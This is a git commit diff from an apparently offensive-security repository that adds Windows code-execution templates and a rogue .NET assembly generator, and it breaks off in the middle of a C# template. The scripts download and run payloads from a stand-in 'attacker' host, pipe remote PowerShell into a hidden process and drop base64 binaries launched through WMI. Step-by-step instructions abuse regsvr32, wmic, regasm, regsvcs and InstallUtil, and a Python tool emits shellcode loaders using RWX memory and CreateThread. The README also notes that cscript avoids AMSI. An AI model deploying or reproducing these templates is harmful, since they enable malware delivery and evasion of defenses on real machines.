Added code-exec-templates and some additions to rogue-dot-net

mgeeky 2020-05-07 01:42:52 +02:00
parent b7c7da7b4e
commit 8b03b5ba40
14 changed files with 806 additions and 723 deletions


@ -1,39 +1,39 @@
#!/bin/bash #!/bin/bash
modname=security2 modname=security2
friendlyname=WAF friendlyname=WAF
if [ $# -ne 1 ]; then if [ $# -ne 1 ]; then
echo "Usage: ./toggleWaf <on|off|status>" echo "Usage: ./toggleWaf <on|off|status>"
exit 1 exit 1
fi fi
case $1 in case $1 in
"on") "on")
if [ $EUID -ne 0 ]; then if [ $EUID -ne 0 ]; then
echo "[!] This function must be run as root. Use sudo." echo "[!] This function must be run as root. Use sudo."
exit 1 exit 1
fi fi
a2enmod $modname > /dev/null a2enmod $modname > /dev/null
systemctl reload apache2 systemctl reload apache2
echo "[+] $friendlyname enabled." echo "[+] $friendlyname enabled."
;; ;;
"off") "off")
if [ $EUID -ne 0 ]; then if [ $EUID -ne 0 ]; then
echo "[!] This function must be run as root. Use sudo." echo "[!] This function must be run as root. Use sudo."
exit 1 exit 1
fi fi
a2dismod $modname > /dev/null a2dismod $modname > /dev/null
systemctl reload apache2 systemctl reload apache2
echo "[-] $friendlyname disabled." echo "[-] $friendlyname disabled."
;; ;;
"status") "status")
if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
echo "[+] $friendlyname is enabled." echo "[+] $friendlyname is enabled."
else else
echo "[-] $friendlyname is disabled." echo "[-] $friendlyname is disabled."
fi fi
;; ;;
esac esac


@ -1,67 +1,71 @@
### A small collection of unobfuscated code-execution primitives in different languages ### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** - `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI** - `wscript.exe` - For general scripts execution. **This one loads AMSI**
--- ---
#### VBScript #### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` - **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` - **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. - **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` - **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
---
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
#### JScript
---
---
#### JScript
#### XSL
XSL files can be executed in the following ways: ---
- Using `wmic.exe`: #### XSL
```
wmic os get /format:"jscript-xslt-template.xsl" XSL files can be executed in the following ways:
```
- Using `wmic.exe`:
Templates: ```
wmic os get /format:"jscript-xslt-template.xsl"
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. ```
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
--- - **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
#### COM Scriptlets
Sample code execution with `regsvr32` can be following: ---
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll #### COM Scriptlets
```
Sample code execution with `regsvr32` can be following:
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` ```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
---
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
#### HTA
HTA files are HTML Applications ---
#### HTA
HTA files are HTML Applications
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ - **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_


@ -1,38 +1,36 @@
' '
' Example of downloading a binary file from the URL, saving it to the ' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching. ' local filesystem and then launching.
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
downloadURL = "http://attacker/payload.exe" downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe" saveAs = "%TEMP%\foo.exe"
parameters = "" parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell") Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs) out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File ' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP") Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False xhr.Open "GET", downloadURL, False
xhr.Send xhr.Send
' STEP 2: Save binary file ' STEP 2: Save binary file
If xhr.Status = 200 Then If xhr.Status = 200 Then
With CreateObject("Adodb.Stream") With CreateObject("Adodb.Stream")
.Open .Open
.Type = 1 .Type = 1
.write xhr.responseBody .write xhr.responseBody
.savetofile out, 2 .savetofile out, 2
End With End With
' STEP 3: Execute file ' STEP 3: Execute file
cmd = out & " " & parameters cmd = out & " " & parameters
MsgBox cmd sh.Run cmd, 0, False
sh.Run cmd, 0, False End If
End If Set sh = Nothing
Set sh = Nothing
Set xhr = Nothing Set xhr = Nothing


@ -0,0 +1,34 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
scriptURL = "http://attacker/script.ps1"
launcher = "powershell -nop -w hid -Command -"
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", scriptURL, False
xhr.Send
Function bin2a(Binary)
Dim I,S
For I = 1 to LenB(Binary)
S = S & Chr(AscB(MidB(Binary,I,1)))
Next
bin2a = S
End Function
If xhr.Status = 200 Then
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine bin2a(xhr.responseBody)
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
End If
Set xhr = Nothing
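Review bot: The header comment at the top of this new file ("Example of downloading a binary file from the URL, saving it to the local filesystem and then launching.") is copied from download-file-and-exec.vbs and does not describe what this script does: nothing is written to the filesystem here, and the downloaded content is a script rather than a binary. The response body is converted character by character by bin2a and handed to the launcher process through its StdIn, which is the whole point of this variant and what a reader of the file should be told. Suggest replacing the two header lines with `' Example of downloading a script from the URL and passing it to a` / `' launcher process via its StdIn, without writing anything to disk.`. The README entry for this file should then match that wording.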


@ -0,0 +1,47 @@
'
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
saveFileAs = "%TEMP%\foo.exe"
launchParameters = ""
' =============================================================
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
' =============================================================
Function Base64Decode(ByVal vCode)
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
End Function
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveFileAs)
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write Base64Decode(fileBuffer)
.savetofile out, 2
End With
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
command = out & " " & launchParameters
proc.Create command, Null, conf, intProcessID


@ -1,15 +1,15 @@
<?xml version='1.0'?> <?xml version='1.0'?>
<stylesheet <stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder" xmlns:user="placeholder"
version="1.0"> version="1.0">
<output method="text"/> <output method="text"/>
<ms:script implements-prefix="user" language="JScript"> <ms:script implements-prefix="user" language="JScript">
<![CDATA[ <![CDATA[
// Hello world // Hello world
var shell = new ActiveXObject("WScript.Shell"); var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!"); shell.Popup("Hello world from JScript XSL!");
]]> </ms:script> ]]> </ms:script>
</stylesheet> </stylesheet>


@ -1,20 +1,20 @@
' '
' This script uses WMI class' Win32_Process static method Create to ' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12). ' execute given command in a hidden window (ShowWindow = 12).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
command = "notepad.exe" command = "notepad.exe"
computer = "." computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2") & computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup") Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_ Set conf = startup.SpawnInstance_
conf.ShowWindow = 12 conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create command, Null, conf, intProcessID proc.Create command, Null, conf, intProcessID


@ -1,13 +1,13 @@
' '
' This script uses classic WScript.Shell Run method to ' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0) ' execute given command in a hidden window (second param = 0)
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
command = "notepad.exe" command = "notepad.exe"
With CreateObject("WScript.Shell") With CreateObject("WScript.Shell")
.Run command, 0, False .Run command, 0, False
End With End With


@ -1,15 +1,15 @@
<?XML version="1.0"?> <?XML version="1.0"?>
<scriptlet> <scriptlet>
<registration <registration
progid="Foo" progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript"> <script language="JScript">
<![CDATA[ <![CDATA[
var command = "notepad.exe"; var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command); var r = new ActiveXObject("WScript.Shell").Run(command);
]]> ]]>
</script> </script>
</registration> </registration>
</scriptlet> </scriptlet>


@ -1,14 +1,14 @@
<?xml version='1.0'?> <?xml version='1.0'?>
<stylesheet <stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder" xmlns:user="placeholder"
version="1.0"> version="1.0">
<output method="text"/> <output method="text"/>
<ms:script implements-prefix="user" language="JScript"> <ms:script implements-prefix="user" language="JScript">
<![CDATA[ <![CDATA[
var command = "notepad"; var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command); var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script> ]]> </ms:script>
</stylesheet> </stylesheet>


@ -1,14 +1,14 @@
<html> <html>
<head> <head>
<script language="VBScript"> <script language="VBScript">
Sub foo Sub foo
command = "notepad.exe" command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell") Set objShell = CreateObject("Wscript.Shell")
objShell.Run command objShell.Run command
End Sub End Sub
foo() foo()
</script> </script>
</head> </head>
<body> <body>
</body> </body>
</html> </html>


@ -1,19 +1,19 @@
' '
' This script uses classic WScript.Shell Exec method to ' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated ' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example). ' launcher command (powershell.exe in this example).
' '
' Mariusz B. / mgeeky, <mb@binary-offensive.com> ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky) ' (https://github.com/mgeeky)
' '
command = "notepad.exe" command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -" launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell") With CreateObject("WScript.Shell")
With .Exec(launcher) With .Exec(launcher)
.StdIn.WriteLine command .StdIn.WriteLine command
.StdIn.WriteBlankLines 1 .StdIn.WriteBlankLines 1
.Terminate .Terminate
End With End With
End With End With


@ -1,90 +1,90 @@
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution ## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) - [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) - [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) - [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
### Step 1: Generate key.snk file ### Step 1: Generate key.snk file
``` ```
powershell -file build.ps1 powershell -file build.ps1
``` ```
### Step 2: Generate source code file ### Step 2: Generate source code file
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage: Usage:
``` ```
python3 generateRogueDotNet.py --help python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz B. / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile> usage: .\generateRogueDotNet.py [options] <inputFile>
positional arguments: positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments: optional arguments:
-h, --help show this help message and exit -h, --help show this help message and exit
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
``` ```
Sample use case: Sample use case:
``` ```
python3 generateRogueDotNet.py -r notepad64.bin > program.cs python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode. [?] File specified as raw Shellcode.
``` ```
### Step 3: Compilate library .NET Assembly ### Step 3: Compilate library .NET Assembly
``` ```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
``` ```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
``` ```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
``` ```
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: ### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
- x86: - x86:
``` ```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
``` ```
- x64: - x64:
``` ```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
``` ```


@ -1,387 +1,387 @@
#!/usr/bin/python3 #!/usr/bin/python3
# #
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. # Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
# #
# Step 1: Generate source code file # Step 1: Generate source code file
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs # cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
# #
# Step 2: Compilate library .NET Assembly # Step 2: Compilate library .NET Assembly
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used # if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). # to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
# Then proper compilation command will be: # Then proper compilation command will be:
# #
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: # Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
# x86: # x86:
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# x64: # x64:
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz B. / mgeeky, <mb@binary-offensive.com>
# #
import re import re
import os import os
import io import io
import sys import sys
import gzip import gzip
import base64 import base64
import string import string
import struct import struct
import random import random
import binascii import binascii
import argparse import argparse
def getCompressedPayload(filePath): def getCompressedPayload(filePath):
out = io.BytesIO() out = io.BytesIO()
encoded = '' encoded = ''
with open(filePath, 'rb') as f: with open(filePath, 'rb') as f:
inp = f.read() inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo: with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp) fo.write(inp)
encoded = base64.b64encode(out.getvalue()) encoded = base64.b64encode(out.getvalue())
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
encoded.decode() encoded.decode()
) )
return powershell return powershell
def getSourceFileContents(payload, _format): def getSourceFileContents(payload, _format):
launchCode = '' launchCode = ''
usings = '' usings = ''
if _format == 'exe': if _format == 'exe':
exeLaunchCode = string.Template(''' exeLaunchCode = string.Template('''
public static void Execute() { public static void Execute() {
string payload = "$payload2"; string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload); byte[] decoded = System.Convert.FromBase64String(payload);
Assembly asm = Assembly.Load(decoded); Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint; MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name); object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null); method.Invoke(instance, null);
}''').safe_substitute( }''').safe_substitute(
payload2 = base64.b64encode(payload.encode()).decode() payload2 = base64.b64encode(payload.encode()).decode()
) )
launchCode = exeLaunchCode launchCode = exeLaunchCode
elif _format == 'raw': elif _format == 'raw':
foo = str(binascii.hexlify(payload), 'ascii') foo = str(binascii.hexlify(payload), 'ascii')
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
encodedPayload = ' ' encodedPayload = ' '
for i in range(len(fooarr)): for i in range(len(fooarr)):
if i % 16 == 0 and i > 0: if i % 16 == 0 and i > 0:
encodedPayload += '\n ' encodedPayload += '\n '
encodedPayload += '{}, '.format(fooarr[i]) encodedPayload += '{}, '.format(fooarr[i])
encodedPayload = encodedPayload.strip()[:-1] encodedPayload = encodedPayload.strip()[:-1]
shellcodeLoader = string.Template(''' shellcodeLoader = string.Template('''
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern IntPtr VirtualAlloc( private static extern IntPtr VirtualAlloc(
IntPtr lpAddress, UIntPtr dwSize, IntPtr lpAddress, UIntPtr dwSize,
UInt32 flAllocationType, UInt32 flAllocationType,
UInt32 flProtect UInt32 flProtect
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern bool VirtualFree( private static extern bool VirtualFree(
IntPtr lpAddress, IntPtr lpAddress,
UInt32 dwSize, UInt32 dwSize,
UInt32 dwFreeType UInt32 dwFreeType
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern IntPtr CreateThread( private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes, UInt32 lpThreadAttributes,
UInt32 dwStackSize, UInt32 dwStackSize,
IntPtr lpStartAddress, IntPtr lpStartAddress,
IntPtr param, IntPtr param,
UInt32 dwCreationFlags, UInt32 dwCreationFlags,
ref UInt32 lpThreadId ref UInt32 lpThreadId
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern bool CloseHandle( private static extern bool CloseHandle(
IntPtr hHandle IntPtr hHandle
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( private static extern UInt32 WaitForSingleObject(
IntPtr hHandle, IntPtr hHandle,
UInt32 dwMilliseconds UInt32 dwMilliseconds
); );
private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000; private static UInt32 MEM_RELEASE = 0x8000;
public static void Execute() { public static void Execute() {
byte[] payload = new byte[$payloadSize] { byte[] payload = new byte[$payloadSize] {
$payload2 $payload2
}; };
